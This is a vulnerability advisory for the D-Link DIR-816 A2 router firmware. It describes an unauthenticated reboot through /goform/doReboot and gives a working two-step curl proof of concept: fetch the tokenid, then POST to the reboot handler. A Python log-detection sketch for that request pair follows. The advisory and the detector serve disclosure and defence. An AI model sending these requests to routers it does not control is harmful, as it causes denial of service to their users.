D-Link DIR-816 A2_v1.10CNB04.img Reboot router without authentication
Firmware information
- Manufacturer's address: https://www.dlink.com/
- Firmware download address: http://tsd.dlink.com.tw/GPL.asp
Affected version
The picture above shows the latest firmware for this version
Vulnerability details
The vulnerability is in the /goform/doReboot handler. No authentication is required to call it, and the reboot is executed when the function returns.
PoC
First, get the tokenid:
curl http://192.168.0.1/dir_login.asp | grep tokenid
Then run the following PoC:
curl -i -X POST http://192.168.0.1/goform/doReboot -d tokenid=xxxx
The router will then reboot
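Detection sketch for the request pair above, added here as an example and not part of the original advisory: it scans web access logs for a POST to /goform/doReboot from a host outside an admin allowlist and notes whether the same host fetched /dir_login.asp shortly before. The Common Log Format input, the 60-second window, the allowlist and the sample lines are assumptions.

```python
import re
from datetime import datetime, timedelta

# Assumed input: Common Log Format lines from a proxy or sensor that sees
# traffic to the router's web interface.
LINE = re.compile(r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*"')
TOKEN_PAGE = "/dir_login.asp"    # page the tokenid is read from
REBOOT = "/goform/doReboot"      # reboot handler that needs no authentication
WINDOW = timedelta(seconds=60)   # assumed correlation window

def find_reboot_requests(lines, admin_hosts=frozenset()):
    """Return one alert per POST to the reboot handler from a non-admin host."""
    last_token_fetch = {}  # source address -> time of last GET of the token page
    alerts = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        src, path = m["src"], m["path"].split("?", 1)[0]
        if m["method"] == "GET" and path == TOKEN_PAGE:
            last_token_fetch[src] = ts
        elif m["method"] == "POST" and path == REBOOT and src not in admin_hosts:
            seen = last_token_fetch.get(src)
            # True when the token page was fetched just before the reboot call,
            # which matches the two-step sequence of a scripted request.
            scripted = seen is not None and timedelta(0) <= ts - seen <= WINDOW
            alerts.append({"src": src, "time": ts.isoformat(),
                           "token_fetch_before": scripted})
    return alerts

# Constructed sample log lines (not captured from a real device).
SAMPLE = [
    '192.168.0.50 - - [12/Mar/2024:10:00:01 +0000] "GET /dir_login.asp HTTP/1.1" 200 4312',
    '192.168.0.50 - - [12/Mar/2024:10:00:02 +0000] "POST /goform/doReboot HTTP/1.1" 200 0',
    '192.168.0.10 - - [12/Mar/2024:11:30:00 +0000] "POST /goform/doReboot HTTP/1.1" 200 0',
    '192.168.0.77 - - [12/Mar/2024:12:00:00 +0000] "GET / HTTP/1.1" 200 900',
    '192.168.0.77 - - [12/Mar/2024:12:05:00 +0000] "POST /goform/doReboot HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for alert in find_reboot_requests(SAMPLE, admin_hosts={"192.168.0.10"}):
        print(alert)
```

Because the handler does not check authentication, every alert is worth review; the token_fetch_before flag only helps rank them.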

